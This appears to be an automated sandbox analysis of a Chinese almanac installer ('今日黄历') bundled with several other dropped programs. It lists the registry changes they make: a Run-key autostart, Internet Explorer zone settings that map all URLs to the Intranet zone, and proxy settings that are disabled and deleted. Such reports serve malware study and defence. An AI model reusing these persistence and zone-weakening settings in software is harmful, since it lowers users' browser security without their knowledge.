The Dropped creates and/or sets the following values in system registry:
[HKCU\Software\AlmDay]
"InstallPath" = "%Documents and Settings%\%current user%\Application Data\AlmDay"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlmDay]
"DisplayName" = "今日黄历 2.0.3 正式版"
"DisplayVersion" = "1.0.6.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\AlmDay]
"AppFilePath" = "%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlmDay]
"URLInfoAbout" = "http://www.wangren123.com"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlmDay]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\AlmDay\Uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlmDay]
"AppUninst" = "-unreg"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlmDay]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 EE 5E D4 E5 C3 99 18 EF EA B6 89 B4 F5 34 C7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlmDay]
"AppPath" = "%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\AlmDay]
"AlmDay.exe" = "今日黄历应用程序"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Dropped modifies IE settings for security zones to map all local web nodes that have no dots in their names and are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To run itself automatically each time Windows boots, the Dropped adds the following value, which points to its file, to the registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AlmDay" = "%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe /start"
The Dropped modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process IFoxInstall-y-c203945859-run-s-x.exe:1360 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 87 7C 5E 25 3D 63 86 B8 32 D8 C3 39 05 65 94"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process AlmDay.exe:1016 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\AlmDay]
"AlmDayQuick.exe" = "今日黄历辅助进程 应用程序"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 5C 9E 60 84 6F C7 77 9D CA C7 DB 25 64 48 EB"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process assistupdate.exe:2660 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F C3 F6 E5 67 3E 74 66 B7 D2 3C 5B C2 FB AD 27"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process setup_2948-140896.exe:1164 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\FM4.0\201409180317]
"FHSev.exe" = "音乐通用检测报告"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 AA A8 FF F3 87 20 33 10 D6 06 52 0C 79 6A CE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The process axult.exe:460 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 51 F9 8F C4 41 FB 29 07 17 C0 0B 8A 8B 06 78"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:264 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 1B 6D 18 2F 85 64 8E A3 12 BB EE 9F 15 27 2F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\WinRAR SFX]
"C%%Program Files%fjwyusp" = "%Program Files%\fjwyusp"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fjwyusp]
"fjwyusp.exe" = "fjwyusp"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process AppleDesktop.exe:1952 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 54 36 A6 55 A4 46 CF FD CD A2 09 D1 68 B1 70"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-22915" = "Contains the files and folders that you have deleted."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
